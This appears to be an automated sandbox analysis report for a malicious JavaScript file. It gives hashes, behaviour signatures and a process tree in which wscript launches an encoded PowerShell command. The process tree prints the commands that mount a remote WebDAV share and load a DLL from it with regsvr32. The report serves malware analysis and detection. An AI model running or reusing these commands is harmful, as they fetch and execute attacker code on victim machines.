Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 12:20
Static task
static1
Behavioral task
behavioral1
Sample
1688429849263022239.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1688429849263022239.js
Resource
win10v2004-20241007-en
General
-
Target
1688429849263022239.js
-
Size
720KB
-
MD5
6bb4dffdd348a4c3b1a2c22d6606e9f0
-
SHA1
f5d7853b07bf571a3ef736552ac9e7af914ec0b3
-
SHA256
99009e3c89f424fd01b517b2b644e587677c1bf42a3791d67ff8ec05e40eaace
-
SHA512
0000104cbda57ff9bd5ba38a6676c570f766465ded5a51adbd95753ec9bb78e664d31d92f91d266b8db7cf800262d235a6fd80da44654399db710ed7cb540b2d
-
SSDEEP
6144:I6G26HDfmyelKpU1lDA40K+SUbXeDA40K+SUbjTFrE1:ZG/TOKpU1+40K+SUbXR40K+SUbjTFrE1
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2544 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2212 wrote to memory of 2544 2212 wscript.exe 30 PID 2212 wrote to memory of 2544 2212 wscript.exe 30 PID 2212 wrote to memory of 2544 2212 wscript.exe 30 PID 2544 wrote to memory of 2812 2544 powershell.exe 32 PID 2544 wrote to memory of 2812 2544 powershell.exe 32 PID 2544 wrote to memory of 2812 2544 powershell.exe 32 PID 2544 wrote to memory of 2316 2544 powershell.exe 33 PID 2544 wrote to memory of 2316 2544 powershell.exe 33 PID 2544 wrote to memory of 2316 2544 powershell.exe 33 PID 2544 wrote to memory of 2316 2544 powershell.exe 33 PID 2544 wrote to memory of 2316 2544 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1688429849263022239.js1⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA7AHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA0ADcAMQAyADAAMQA0ADIAMQA3ADQANwAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\94.159.113.79@8888\davwwwroot\3⤵PID:2812
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\94.159.113.79@8888\davwwwroot\218471201421747.dll3⤵PID:2316
-
-